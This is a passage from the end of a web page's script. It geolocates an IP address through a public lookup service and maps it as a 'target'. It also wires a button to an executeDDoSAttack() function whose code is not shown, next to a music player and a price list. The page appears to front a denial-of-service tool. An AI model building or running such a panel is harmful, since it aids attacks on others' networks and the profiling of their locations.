  if (!ipRegex.test(ip)) {
    showPopup("Error", "Invalid IP address format");
    return;
  }
  
  const btn = document.getElementById('trackBtn');
  btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> Analyzing...'; 
  btn.disabled = true;

  try {
    const res = await fetch(`https://ipwhois.app/json/${ip}`);
    const data = await res.json();
    
    if (!data.success) {
      showPopup("Error", "IP address not valid or not found");
      return;
    }

    const resultDiv = document.getElementById('ipResult');
    resultDiv.innerHTML = `
      <div><i class="fas fa-network-wired"></i> <b>IP Address:</b> ${data.ip}</div>
      <div><i class="fas fa-globe"></i> <b>Country:</b> ${data.country} (${data.country_code})</div>
      <div><i class="fas fa-flag"></i> <b>Flag:</b> ${data.country_flag}</div>
      <div><i class="fas fa-location-dot"></i> <b>Region:</b> ${data.region}</div>
      <div><i class="fas fa-city"></i> <b>City:</b> ${data.city}</div>
      <div><i class="fas fa-envelope"></i> <b>Postal Code:</b> ${data.postal}</div>
      <div><i class="fas fa-clock"></i> <b>Timezone:</b> ${data.timezone} (${data.timezone_gmt})</div>
      <div><i class="fas fa-signal"></i> <b>ISP:</b> ${data.isp}</div>
      <div><i class="fas fa-building"></i> <b>Organization:</b> ${data.org}</div>
      <div><i class="fas fa-server"></i> <b>ASN:</b> ${data.asn}</div>
      <div><i class="fas fa-map"></i> <b>Coordinates:</b> ${data.latitude}, ${data.longitude}</div>
    `;
    
    resultDiv.style.display = 'block';

    if (!map) {
      document.getElementById('map').style.display = 'block';
      map = L.map('map').setView([data.latitude, data.longitude], 10);
      L.tileLayer('https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png', {
        attribution: '&copy; <a href="https://openstreetmap.org">OpenStreetMap</a> contributors'
      }).addTo(map);
      marker = L.marker([data.latitude, data.longitude]).addTo(map)
        .bindPopup(`<b>Target Location: ${data.ip}</b><br>${data.city}, ${data.region}, ${data.country}`)
        .openPopup();
    } else {
      map.setView([data.latitude, data.longitude], 10);
      marker.setLatLng([data.latitude, data.longitude])
        .setPopupContent(`<b>Target Location: ${data.ip}</b><br>${data.city}, ${data.region}, ${data.country}`)
        .openPopup();
    }

  } catch (err) {
    console.error(err);
    showPopup("Error", "Failed to retrieve network intelligence data");
  } finally {
    btn.innerHTML = '<i class="fas fa-crosshairs"></i> Analyze Target';
    btn.disabled = false;
  }
});

byId('btnBackToFirst').onclick = () => {
  show('home');
};

byId('btnSend').addEventListener('click', () => executeSelectedAction());
byId('btnStartDDoS').addEventListener('click', () => executeDDoSAttack());

byId('btnSearchMusic').addEventListener('click', searchMusic);
byId('btnDownload').addEventListener('click', downloadMusic);
byId('btnPlayPause').addEventListener('click', togglePlayPause);

byId('musicQuery').addEventListener('keypress', (e) => {
  if (e.key === 'Enter') {
    searchMusic();
  }
});

document.addEventListener('DOMContentLoaded', function() {
  initBottomNav();
  createParticles();
  show('pricelist');
});
</script>
</body>
</html>